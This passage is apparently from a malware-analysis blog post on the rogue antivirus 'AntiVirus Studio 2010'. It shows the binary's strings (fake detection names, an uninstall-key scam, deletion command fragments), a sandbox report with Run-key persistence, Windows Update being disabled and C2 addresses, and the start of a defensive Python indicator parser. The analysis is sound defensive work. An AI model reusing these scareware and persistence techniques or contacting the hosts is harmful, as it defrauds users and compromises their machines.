0x00076AA0    0x0000000A    InstallDir
0x00076AAC    0x00000015    AntiVirus Studio 2010
0x00076AC4    0x00000006    SoftID
0x00076ACC    0x00000013    ScanSystemOnStartup
0x00076AE0    0x00000014    AutomaticallyUpdates
0x00076AF8    0x0000000F    MinimizeOnStart
0x00076B08    0x0000000E    BackgroundScan
0x00076B18    0x00000015    BackgroundScanTimeout
0x00076B30    0x00000015    AntiVirus Studio 2010
0x00076B48    0x0000000B    DisplayName
0x00076B58    0x00000049    Software\Microsoft\Windows\CurrentVersion\Uninstall\AntiVirus Studio 2010
0x00076BA4    0x0000000F    &quot;%s&quot; /UNINSTALL
0x00076BB4    0x0000000F    UninstallString
0x00076BC8    0x00000049    Software\Microsoft\Windows\CurrentVersion\Uninstall\AntiVirus Studio 2010
0x00076C14    0x00000006    &quot;%s&quot;,1
0x00076C1C    0x0000000B    DisplayIcon
0x00076C28    0x00000049    Software\Microsoft\Windows\CurrentVersion\Uninstall\AntiVirus Studio 2010
0x00076C74    0x00000015    AntiVirus Studio 2010
0x00076C8C    0x00000005    %s\%s
0x00076C94    0x00000015    AntiVirus Studio 2010
0x00076CAC    0x00000009    %s\%s.lnk
0x00076CB8    0x00000015    AntiVirus Studio 2010
0x00076CD0    0x00000009    %s\%s.lnk
0x00076CDC    0x00000015    AntiVirus Studio 2010
0x00076CF4    0x00000012    %s\Activate %s.lnk
0x00076D08    0x00000009    /REGISTER
0x00076D14    0x00000015    AntiVirus Studio 2010
0x00076D2C    0x00000019    %s\How to Activate %s.lnk
0x00076D48    0x0000000E    /registration/
0x00076D58    0x0000000B    http://www.
0x00076D64    0x0000000E    http://%s/help
0x00076D74    0x00000015    AntiVirus Studio 2010
0x00076D8C    0x0000000E    %s\Help %s.lnk
0x00076D9C    0x00000015    AntiVirus Studio 2010
0x00076DB4    0x00000032    %s\Microsoft\Internet Explorer\Quick Launch\%s.lnk
0x00076DE8    0x0000001A    install complete, wait gui
0x00076E04    0x0000001A    gui done, execute software
0x00076E20    0x00000017    delete temp file = [%s]
0x00076E38    0x00000012    execute cmd = [%s]
0x00076E4C    0x00000016    create process success
0x00076E64    0x00000024    create process failed with code [%d]
0x00076E8C    0x00000006    gle=%d
0x00076E94    0x00000017    extract distrib to [%s]
0x00076EAC    0x0000002B    create file success, write file return [%d]
0x00076ED8    0x00000021    create file failed with code [%d]
0x00076EFC    0x00000006    gle=%d
0x00076F04    0x0000001C    install distrib [%s] to [%s]
0x00076F24    0x00000005    13:48
0x00076F2C    0x00000015    &quot;%s&quot; -p&quot;%s&quot; -y -o&quot;%s&quot;
0x00076F44    0x00000011    command line [%s]
0x00076F58    0x00000016    create process success
0x00076F70    0x00000008    output {
0x00076F7C    0x00000008    } output
0x00076F88    0x00000024    create process failed with code [%d]
0x00076FB0    0x00000006    gle=%d
0x00076FB8    0x00000021    create pipe failed with code [%d]
0x00076FDC    0x00000008    dir [%s]
0x00076FE8    0x00000013    cmd.exe /C dir &quot;%s&quot;
0x00076FFC    0x00000011    command line [%s]
0x00077010    0x00000016    create process success
0x00077028    0x00000008    output {
0x00077034    0x00000008    } output
0x00077040    0x00000024    create process failed with code [%d]
0x00077068    0x00000006    gle=%d
0x00077070    0x00000021    create pipe failed with code [%d]
0x00077094    0x00000010    Invalid DateTime
0x000770A8    0x00000014    Invalid DateTimeSpan
0x000770C0    0x0000000E    bad allocation
0x000770D0    0x0000000A    CUninstDlg
0x000770DC    0x00000017    /uninstall.php?machine=
0x000770F4    0x00000007    http://
0x000770FC    0x0000000B    Hello world
0x00077108    0x0000000C    explorer.exe
0x00077120    0x00000015    AntiVirus Studio 2010
0x00077138    0x00000042    Uninstall key is correct. Are you sure want to continue uninstall?
0x0007717C    0x00000015    AntiVirus Studio 2010
0x00077194    0x0000001A    Unistall key is incorrect.
0x000771B0    0x00000015    AntiVirus Studio 2010
0x00077EF8    0x00000010    IDR_SKIN_%02X_%s
0x00077F0C    0x00000012    IDR_SKIN_%02X_%08X
0x00077F28    0x00000014    IDR_SKIN_%02X_%s_RGN
0x00077F40    0x00000016    IDR_SKIN_%02X_%08X_RGN
0x00077F60    0x00000015    IDR_SKIN_%02X_%s_%02X
0x00077F78    0x00000017    IDR_SKIN_%02X_%08X_%02X
0x000782DE    0x00000011    Y@SkinButtonGroup
0x000782F0    0x0000000F    SkinButtonGroup
0x00078300    0x0000000F    SkinButtonGroup
0x00078310    0x0000000F    SkinButtonGroup
0x000784A0    0x0000000F    RegEdit_RegEdit
0x000784B8    0x0000000B    Regedit.exe
0x000784C4    0x0000000F    RegEdit_RegEdit
0x000784D4    0x00000011    HKEY_CLASSES_ROOT
0x000784E8    0x00000011    HKEY_CURRENT_USER
0x000784FC    0x00000012    HKEY_LOCAL_MACHINE
0x00078510    0x0000000A    HKEY_USERS
0x0007851C    0x00000015    HKEY_PERFORMANCE_DATA
0x00078534    0x00000013    HKEY_CURRENT_CONFIG
0x00078548    0x0000000D    HKEY_DYN_DATA
0x00078558    0x00000006    HKEY_C
0x00078560    0x00000007    HKEY_CU
0x00078568    0x00000006    HKEY_L
0x00078570    0x00000006    HKEY_U
0x00078578    0x00000006    HKEY_P
0x00078580    0x0000000E    HKEY_CURRENT_C
0x00078590    0x00000006    HKEY_D
0x00078598    0x0000000D    SysTreeView32
0x000785A8    0x0000000D    SysListView32
0x000785B8    0x00000005    logs.
0x000785C0    0x00000005    %u.%s
0x000785C8    0x0000000D    httpsquer.com
0x000785E8    0x00000005    logs.
0x00078691    0x0000000C    ad json_cast
0x000786C1    0x00000013    os_base::eofbit set
0x000786D8    0x00000015    ios_base::failbit set
0x000786F0    0x00000014    ios_base::badbit set
0x00078715    0x00000007    ad cast
0x0007875E    0x0000001A    Akernel32.dIl
0x0007877C    0x0000000C    kernel32.dIl
0x00078798    0x0000000D    Shell_TrayWnd
0x000787A8    0x0000000F    S:(ML;;NW;;;LW)
0x000787B8    0x0000001E    Software\AntiVirus Studio 2010
0x000787DC    0x0000000E    bad allocation
0x000787EC    0x00000006    Trojan
0x000787F4    0x00000005    Virus
0x00078804    0x0000000D    Keygen-Nero.a
0x00078814    0x00000009    rtfme.exe
0x00078820    0x0000001F    TrojanDownloader:Win32/Renos.KO
0x00078840    0x00000009    17dkf.exe
0x0007884C    0x00000018    Adware:Win32/Wheresphere
0x00078868    0x0000000B    qwedvor.exe
0x00078874    0x00000022    TrojanDownloader:Win32/Bredolab.AB
0x00078898    0x0000000D    winlogoff.exe
0x000788A8    0x0000001D    TrojanDownloader:BAT/Lnkget.X
0x000788C8    0x0000000A    format.exe
0x000788D4    0x00000019    Trojan:Win32/Hiloti.gen!D
0x000788F0    0x00000008    test.exe
0x000788FC    0x00000017    Trojan:Win32/Cryptrun.B
0x00078914    0x0000000D    destroyer.exe
0x00078924    0x00000017    Exploit:Win32/Pdfjsc.DE
0x0007893C    0x0000000A    dffuck.exe
0x00078948    0x0000001E    Backdoor:Win32/Poisonivy.gen!A
0x00078968    0x00000008    lols.exe
0x00078974    0x0000001F    TrojanDownloader:Win32/Renos.KN
0x00078994    0x0000000A    hodeme.exe
0x000789A0    0x00000017    Trojan:JS/Redirector.BQ
0x000789B8    0x00000009    cffd4.exe
0x000789C4    0x0000001A    Worm:Win32/Conficker.B!inf
0x000789E0    0x00000006    fe.exe
0x000789E8    0x0000001A    Worm:Win32/Autorun.gen!inf
0x00078A04    0x0000000A    poertd.exe
0x00078A10    0x00000017    Exploit:Win32/Pdfjsc.CR
0x00078A28    0x0000000E    protector2.exe
0x00078A38    0x00000017    Trojan:Win32/Alureon.CT
0x00078A50    0x00000008    safe.exe
0x00078A5C    0x00000019    TrojanDownloader:JS/Renos
0x00078A78    0x00000009    timem.exe
0x00078A84    0x00000016    Worm:Win32/Conficker.C
0x00078A9C    0x0000000A    hiphop.exe
0x00078AA8    0x00000015    Virus:Win32/Alureon.F
0x00078AC0    0x0000000A    2010yo.exe
0x00078ACC    0x00000015    Virus:Win32/Sality.AM
0x00078AE4    0x0000000B    rsrtd12.exe
0x00078AF0    0x00000016    Worm:Win32/Conficker.B
0x00078B08    0x0000000B    dkfjd93.exe
0x00078B14    0x0000001A    Exploit:HTML/IframeRef.gen
0x00078B30    0x0000000E    cocksucker.exe
0x00078B40    0x00000017    Trojan:Win32/Alureon.CT
0x00078B58    0x00000008    kock.exe
0x00078B64    0x00000014    Trojan:Win32/FakeXPA
0x00078B7C    0x0000000A    ploper.exe
0x00078B88    0x0000001F    TrojanDownloader:Win32/Renos.KG
0x00078BA8    0x0000000C    kjh102k3.exe
0x00078BB8    0x00000019    Trojan:Win32/Hiloti.gen!D
0x00078BD4    0x0000000C    hjkgfddd.exe
0x00078BE4    0x00000021    Adware:Win32/ZangoShoppingreports
0x00078C08    0x0000000A    wergfq.exe
0x00078C14    0x00000016    Adware:Win32/GameVance
0x00078C2C    0x00000009    lorsk.exe
0x00078C38    0x00000020    BrowserModifier:Win32/BaiduSobar
0x00078C5C    0x0000000A    cosock.exe
0x00078C68    0x00000013    Adware:Win32/Gibmed
0x00078C7C    0x0000000A    ddhelp.exe
0x00078C88    0x0000001F    TrojanDownloader:Win32/Renos.KF
0x00078CA8    0x00000009    wined.exe
0x00078CB4    0x00000013    Adware:Win32/Hotbar
0x00078CC8    0x00000009    brdss.exe
0x00078CD4    0x00000017    Worm:Win32/Taterf.gen!A
0x00078CEC    0x0000000A    hardwh.exe
0x00078CF8    0x00000016    PWS:Win32/Ceekat.gen!A
0x00078D10    0x0000000A    winifi.exe
0x00078D1C    0x00000016    Worm:Win32/Conficker.C
0x00078D34    0x00000009    rator.exe
0x00078D40    0x00000013    PWS:Win32/Lolyda.AU
0x00078D54    0x0000000A    snowif.exe
0x00078D60    0x00000014    Worm:Win32/Rimecud.A
0x00078D78    0x00000009    sycre.exe
0x00078D84    0x00000017    PWS:Win32/Frethog.gen!B
0x00078D9C    0x0000000A    altedf.exe
0x00078DA8    0x00000016    Worm:Win32/Conficker.B
0x00078DC0    0x00000008    dc_3.exe
0x00078DCC    0x00000014    Worm:Win32/Rimecud.B
0x00078DE4    0x0000000B    ljts-23.exe
0x00078DF0    0x00000013    Worm:Win32/Hamweq.A
0x00078E04    0x0000000A    d20mes.exe
0x00078E10    0x00000013    Worm:Win32/Taterf.B
0x00078E24    0x0000000A    dgxdro.exe
0x00078E30    0x00000011    Generic Dropper.x
0x00078E44    0x00000009    56493.exe
0x00078E50    0x00000019    W32/Autorun.worm!5492698F
0x00078E6C    0x0000000C    wrfwe_di.exe
0x00078E7C    0x0000000C    RealAlert-DI
0x00078E8C    0x0000000C    lkhgg_ea.exe
0x00078E9C    0x0000000C    RealAlert-EA
0x00078EAC    0x0000000D    8gmsed-bd.exe
0x00078EBC    0x00000015    BackDoor-DKA Internet
0x00078ED4    0x0000000B    bzqa43d.exe
0x00078EE0    0x00000010    Downloader-BQZ.a
0x00078EF4    0x0000000C    tryh-blv.exe
0x00078F04    0x0000000E    Downloader-BLV
0x00078F14    0x0000000A    puzpup.exe
0x00078F20    0x00000016    Generic Pup.z!7ec2eb2a
0x00078F38    0x0000000B    hvipws9.exe
0x00078F44    0x00000012    Generic PWS.y!hv.i
0x00078F58    0x0000000D    jdhellwo3.exe
0x00078F68    0x00000017    W32/Koobface.worm.gen.h
0x00078F80    0x0000000C    eelnvd13.exe
0x00078F90    0x0000001F    W32/Autorun.worm.gen.h!7ec2eb2a
0x00078FB0    0x0000000F    a75wef8e0e7.exe
0x00078FC0    0x00000019    W32/Autorun.worm!a758e0e7
0x00078FDC    0x00000012    kjdh_gf_jjdhgd.exe
0x00078FF0    0x0000000E    Downloader-BRW
0x00079000    0x00000011    02c9c3c35bdx5.exe
0x00079014    0x00000017    Generic.dx!02c9c3c35bd5
0x0007902C    0x00000011    ae0965a7157cd.exe
0x00079040    0x00000017    Generic.dx!ae0965a7157c
0x00079058    0x00000011    472a10e2ebxd9.exe
0x0007906C    0x00000017    Generic.dx!472a10e2ebd9
0x00079084    0x0000000C    jkfuckfu.exe
0x00079094    0x00000012    Generic Dropper.js
0x000790A8    0x0000000E    aqfitrlxi2.exe
0x000790B8    0x0000000C    BackDoor-EFQ
0x000790C8    0x0000000E    ppddfcfux.exxe
0x000790D8    0x0000000D    Exploit-PDF.w
0x000790E8    0x0000000D    ddoll3342.exe
0x000790F8    0x0000000E    Downloader-BVW
0x00079108    0x0000000C    1iowieoo.exe
0x00079118    0x0000000E    W32/Renocide.c
0x00079128    0x0000000A    r0life.exe
0x00079134    0x0000000B    NTRootKit-H
0x00079140    0x0000000B    cunifuc.exe
0x0007914C    0x0000000F    W32/Rimecud!mem
0x0007915C    0x0000000C    kilslmd.exex
0x0007916C    0x0000000B    W32/Rimecud
0x00079178    0x0000000B    wdo9rm.exxe
0x00079184    0x00000014    W32/Autorun.worm.zzp
0x0007919C    0x0000000B    jofcdks.exe
0x000791A8    0x00000018    Pigax.gen.a!921565b7f057
0x000791C4    0x0000000B    dd10x10.exe
0x000791D0    0x0000001E    Generic PWS.y!bbg!06085157775A
0x000791F0    0x0000000D    hhbboll_2.exe
0x00079200    0x0000000F    Generic HTool.b
0x00079210    0x00000007    kgn.exe
0x00079218    0x0000000D    Keygen-Nero.a
0x00079228    0x0000000B    pswwg3c.exe
0x00079234    0x00000020    W32/Spybot.worm.gen!3c0e7eeb37a6
0x00079258    0x0000000A    htfad4.exe
0x00079264    0x00000019    RealAlert-HT!b3fe79005ad4
0x00079280    0x0000000A    cowceb.exe
0x0007928C    0x00000021    Generic Malware.co!a!ceb81c269a44
0x000792B0    0x0000000D    wwwsssgen.exe
0x000792C0    0x0000001B    W32/Sality.gen!ac1c3c308a6e
0x000792DC    0x00000009    ds7hw.exe
0x000792E8    0x0000001C    Generic Proxy!m!ad27925df1a5
0x00079308    0x0000000D    alerfa322.exe
0x00079318    0x00000019    RealAlert-DZ!79900a049ee8
0x00079334    0x0000000B    aler3fa.exe
0x00079340    0x00000019    RealAlert-DZ!0b0bf33cbf1e
0x0007935C    0x0000000C    al3erfa3.exe
0x0007936C    0x00000019    RealAlert-DZ!1b92f70bb87c
0x00079388    0x0000000B    alerfa2.exe
0x00079394    0x00000019    LealAlert-DZ!8299f5588bd6
0x000793B0    0x0000000A    alerfa.exe
0x000793BC    0x00000019    RealAlert-DZ!4f19c3b42195
0x000793D8    0x00000010    qwklrvjhqlkj.exe
0x000793EC    0x0000001B    Generic.dx!fia!71e64790169d
0x00079408    0x0000000E    ggwwef9752.exe
0x00079418    0x0000001B    Generic.dx!fia!b77c402ecd7c
0x00079434    0x0000000A    fadz43.exe
0x00079440    0x00000019    RealAlert-DZ!97f406ad794a
0x0007945C    0x0000000C    eephilpe.exe
0x0007946C    0x0000000E    W32/PhilPedo.a
0x0007947C    0x0000000C    wwautrsd.exe
0x0007948C    0x00000019    W32/Autorun.worm!5492698F
0x000794A8    0x0000000B    dwl_bqz.exe
0x000794B4    0x00000010    Downloader-BQZ.a
0x000794C8    0x0000000B    gpupz2a.exe
0x000794D4    0x00000016    Generic Pup.z!7ec2eb2a
0x000794EC    0x0000000C    wqefqw7e.exe
0x000794FC    0x0000001F    W32/Autorun.worm.gen.h!7ec2eb2a
0x0007951C    0x0000000D    warsddd_w.exe
0x0007952C    0x00000019    W32/Autorun.worm!a758e0e7
0x00079548    0x0000000E    wefgetn_00.exe
0x00079558    0x00000017    Generic.dx!02c9c3c35bd5
0x00079570    0x0000000D    gedx_ae09.exe
0x00079580    0x00000017    Generic.dx!ae0965a7157c
0x00079598    0x0000000B    wrcud12.exe
0x000795A4    0x0000000B    W32/Rimecud
0x000795B0    0x0000000B    g_dx234.exe
0x000795BC    0x00000017    Generic.dx!472a10e2ebd9
0x000795D4    0x0000000E    w32-reno-c.exe
0x000795E4    0x0000000E    W32/Renocide.c
0x000795F4    0x0000000C    exppdf_w.exe
0x00079604    0x0000000D    Exploit-PDF.w
0x00079614    0x0000000D    backd-efq.exe
0x00079624    0x0000000C    BackDoor-EFQ
0x00079634    0x0000000E    w32rim_mem.exe
0x00079644    0x0000000F    W32/Rimecud!mem
0x00079654    0x0000000F    gpdfsws_bbg.exe
0x00079664    0x0000001E    Generic PWS.y!bbg!06085157775A
0x00079684    0x00000008    kn.a.exe
0x00079690    0x00000040    %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x
0x000796D4    0x00000026    {3217DABC-8ACF-757B-9E6E-6F00DC89ACEB}
0x000796FC    0x00000026    {FBD69E67-C708-47be-B49F-33D4200B810D}
0x00079724    0x00000026    {ac7ddde0-7ff9-4d56-0FA9-decf41a6f167}
0x0007974C    0x0000001E    Software\AntiVirus Studio 2010
0x0007976C    0x00000015    AntiVirus Studio 2010
0x00079784    0x00000015    AntiVirus Studio 2010
0x0007979C    0x00000015    AntiVirus Studio 2010
0x000797B4    0x00000015    AntiVirus Studio 2010
0x000797CC    0x00000015    AntiVirus Studio 2010
0x000797E4    0x00000015    AntiVirus Studio 2010
0x000797FC    0x0000001E    Software\AntiVirus Studio 2010
0x0007981C    0x0000001A    \AntiVirus Studio 2010.exe
0x00079838    0x0000000F    __MessageWindow
0x0007984C    0x0000000F    __MessageWindow
0x0007985C    0x00000013    SystemTrayIconClass
0x00079870    0x00000013    SystemTrayIconClass
0x00079884    0x00000013    SystemTrayIconClass
0x000798BC    0x00000012    %s:Zone.Identifier
0x000798D4    0x00000030    SOFTWARE\Microsoft\Internet Explorer\Extensions\
0x00079908    0x00000005    CLSID
0x00079910    0x0000000F    \InprocServer32
0x00079920    0x00000006    CLSID\
0x00079928    0x00000016    \system32\kernel32.dll
0x00079940    0x00000011    Internet Explorer
0x00079984    0x0000000D    rmdir /S /Q &quot;
0x00079998    0x00000008    del /Q &quot;
0x000799B0    0x0000000A    if exist &quot;
0x000799C0    0x00000008    del /Q &quot;
0x000799CC    0x0000000E    bad allocation
0x000799DC    0x00000010    0123456789ABCDEF
0x00079A08    0x0000000E    bad allocation
0x00079A18    0x0000000E    bad allocation
0x00079A28    0x00000060    ..\..\..\..\Library\CommonLibW32\lib\src\hex.cpp
0x00079A8C    0x00000012    in &amp;&amp; out
0x00079AA0    0x00000010    0123456789ABCDEF
0x00079AB8    0x00000060    ..\..\..\..\Library\CommonLibW32\lib\src\hex.cpp
0x00079B1C    0x00000012    in &amp;&amp; out
0x00079B30    0x00000010    Invalid DateTime
0x00079B44    0x00000014    Invalid DateTimeSpan
0x00079B5C    0x0000000E    bad allocation
0x00079B70    0x0000000E    bad allocation
0x00079B80    0x0000002C    SOFTWARE\Microsoft\Windows NT\CurrentVersion
0x00079BB0    0x00000010    DigitalProductId
0x00079BC4    0x00000010    DigitalProductId
0x00079BDC    0x0000000E    bad allocation
0x00079BF0    0x0000000E    bad allocation
0x00079C08    0x00000066    ..\..\..\..\Library\CommonLibW32\lib\src\membuf.cpp
0x00079C70    0x00000034    offset + count &lt;= m_length
0x00079CD8    0x0000000E    bad allocation
0x00079CE8    0x00000060    ..\..\..\..\Library\CommonLibW32\rsa\cpp\rsa.cpp
0x00079D4C    0x00000012    in &amp;&amp; out
0x00079D60    0x00000060    ..\..\..\..\Library\CommonLibW32\rsa\cpp\rsa.cpp
0x00079DC4    0x00000012    in &amp;&amp; out
0x00079DD8    0x0000000E    bad allocation
0x00079DE8    0x00000058    ..\..\..\..\Library\jsonlib\src\elements.cpp
0x00079E44    0x0000001A    m_pElementImp
0x00079E60    0x00000058    ..\..\..\..\Library\jsonlib\src\elements.cpp
0x00079EBC    0x0000001A    m_pElementImp
0x00079ED8    0x00000013    Array out of bounds
0x00079EEC    0x0000001E    Object member already exists: 
0x00079F0C    0x00000017    Object name not found: 
0x00079F24    0x00000010    list too long
0x0007A071    0x0000000D    ad allocation
0x0007A080    0x00000054    ..\..\..\..\Library\jsonlib\src\reader.cpp
0x0007A0D8    0x0000002A    m_iStr.eof() == false
0x0007A104    0x0000003A    m_itCurrent != m_Tokens.end()
0x0007A140    0x00000054    ..\..\..\..\Library\jsonlib\src\reader.cpp
0x0007A198    0x00000054    ..\..\..\..\Library\jsonlib\src\reader.cpp
0x0007A1F0    0x0000003A    m_itCurrent != m_Tokens.end()
0x0007A22C    0x00000024    Expected End of token stream; found 
0x0007A25C    0x00000005    false
0x0007A26C    0x00000020    Unexpected character in stream: 
0x0007A290    0x00000011    Expected string: 
0x0007A2AC    0x00000022    Invalid hex digit parsing \uXXXX: 
0x0007A2D0    0x0000002F    Unrecognized escape sequence found in string: \
0x0007A304    0x0000000F    0123456789.eE-+
0x0007A314    0x0000001E    Unexpected end of token stream
0x0007A334    0x00000012    Unexpected token: 
0x0007A348    0x0000001F    Duplicate object member token: 
0x0007A368    0x00000026    Unexpected character in NUMBER token: 
0x0007A398    0x0000001E    Unexpected End of token stream
0x0007A3B8    0x00000012    Unexpected token: 
0x0007A3E2    0x0000002C    Am_iStr.eof() == false
0x0007A410    0x00000054    ..\..\..\..\Library\jsonlib\src\reader.cpp
0x006F5420    0x000000D2    You  need  uninstall key for security reasons. To receive uninstall key press &quot;Get Uninstall Key&quot; button.</pre></td></tr></table></div>

<p>And this is a sandbox report of the installer.</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">Detailed report of suspicious malware actions:
&nbsp;
Created file on defined folder: C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\AntiVirus Studio 2010.lnk
Created file on defined folder: C:\Documents and Settings\Administrator\Start Menu\Programs\AntiVirus Studio 2010.lnk
Created file on defined folder: C:\Documents and Settings\Administrator\Start Menu\Programs\AntiVirus Studio 2010\Activate AntiVirus Studio 2010.lnk
Created file on defined folder: C:\Documents and Settings\Administrator\Start Menu\Programs\AntiVirus Studio 2010\AntiVirus Studio 2010.lnk
Created file on defined folder: C:\Documents and Settings\Administrator\Start Menu\Programs\AntiVirus Studio 2010\Help AntiVirus Studio 2010.lnk
Created file on defined folder: C:\Documents and Settings\Administrator\Start Menu\Programs\AntiVirus Studio 2010\How to Activate AntiVirus Studio 2010.lnk
Defined file type created: C:\Documents and Settings\Administrator\Application Data\AntiVirus Studio 2010\AntiVirus Studio 2010.exe
Defined file type created: C:\Documents and Settings\Administrator\Application Data\AntiVirus Studio 2010\securitycenter.exe
Defined file type created: C:\Documents and Settings\Administrator\Application Data\AntiVirus Studio 2010\securityhelper.exe
Defined file type created: C:\Documents and Settings\Administrator\Application Data\AntiVirus Studio 2010\taskmgr.dll
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\02c9c3c35bdx5.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\17dkf.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\472a10e2ebxd9.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\56493.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\ae0965a7157cd.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\al3erfa3.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\aler3fa.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\alerfa.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\backd-efq.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\cunifuc.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\dc_3.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\dd10x10.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\ddhelp.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\ddoll3342.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\dkfjd93.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\ds7hw.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\eelnvd13.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\eephilpe.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\fe.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\format.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\gedx_ae09.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\gpupz2a.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\hardwh.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\hhbboll_2.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\hiphop.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\hodeme.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\hvipws9.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\jdhellwo3.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\jofcdks.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\kjdh_gf_jjdhgd.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\kock.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\lols.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\lorsk.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\pswwg3c.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\qwedvor.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\qwklrvjhqlkj.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\r0life.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\rator.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\rtfme.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\safe.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\snowif.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\sycre.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\test.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\timem.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\wergfq.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\winlogoff.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\wqefqw7e.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\wrcud12.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\wrfwe_di.exe
Defined registry AutoStart location added or modified: machine\system\CurrentControlSet\Services\wuauserv\Start = 04000000
Defined registry AutoStart location added or modified: user\current\software\Microsoft\Windows\CurrentVersion\Run\63vnpgureoog = C:\Documents and Settings\Administrator\Desktop\installer_m_93.exe
Defined registry AutoStart location added or modified: user\current\software\Microsoft\Windows\CurrentVersion\Run\AntiVirus Studio 2010 = &quot;C:\Documents and Settings\Administrator\Application Data\AntiVirus Studio 2010\AntiVirus Studio 2010.exe&quot; /STARTUP
Defined registry AutoStart location added or modified: user\current\software\Microsoft\Windows\CurrentVersion\Run\SecurityCenter = C:\Documents and Settings\Administrator\Application Data\AntiVirus Studio 2010\securitycenter.exe
Internet connection: C:\Documents and Settings\Administrator\Desktop\installer_m_93.exe Connects to &quot;92.60.177.241&quot; on port 80 (TCP - HTTP).
Internet connection: C:\Sandbox\Administrator\DefaultBox\user\current\Application Data\AntiVirus Studio 2010\AntiVirus Studio 2010.exe Connects to &quot;111.90.150.129&quot; on port 80 (TCP - HTTP).
Modified or overwritten file on defined folder: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\553z8yxt.default\localstore.rdf
Modified or overwritten file on defined folder: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\553z8yxt.default\urlclassifierkey3.txt
Modified or overwritten file on defined folder: C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\MSIMGSIZ.DAT
Query DNS: httpload. net
Query DNS: www.antivirusstudio2010new. com
&nbsp;
Risk evaluation result: High</pre></div></div>
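<p>The report above becomes easier to act on once its lines are turned into indicators, and one entry deserves decoding: the sandbox prints REG_DWORD data as raw little-endian bytes, so wuauserv\Start = 04000000 means the Windows Update service was set to 4 (SERVICE_DISABLED). The following Python is an added example, not part of the original post and not the sandbox's own tooling. It parses a subset of the report lines copied from above, decodes the Start value, and collects the Run-key persistence entries, dropped executables, outbound connections and the space-defanged DNS names; the finding wording and the %TEMP% heuristic are the editor's own.</p>

```python
import re

# Lines copied from the sandbox report above (a subset; most dropped-file
# entries and the "Risk evaluation" line are left out for brevity).
REPORT = r"""
Defined file type created: C:\Documents and Settings\Administrator\Application Data\AntiVirus Studio 2010\AntiVirus Studio 2010.exe
Defined file type created: C:\Documents and Settings\Administrator\Application Data\AntiVirus Studio 2010\taskmgr.dll
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\56493.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\dkfjd93.exe
Defined registry AutoStart location added or modified: machine\system\CurrentControlSet\Services\wuauserv\Start = 04000000
Defined registry AutoStart location added or modified: user\current\software\Microsoft\Windows\CurrentVersion\Run\63vnpgureoog = C:\Documents and Settings\Administrator\Desktop\installer_m_93.exe
Defined registry AutoStart location added or modified: user\current\software\Microsoft\Windows\CurrentVersion\Run\AntiVirus Studio 2010 = "C:\Documents and Settings\Administrator\Application Data\AntiVirus Studio 2010\AntiVirus Studio 2010.exe" /STARTUP
Internet connection: C:\Documents and Settings\Administrator\Desktop\installer_m_93.exe Connects to "92.60.177.241" on port 80 (TCP - HTTP).
Query DNS: httpload. net
Query DNS: www.antivirusstudio2010new. com
"""

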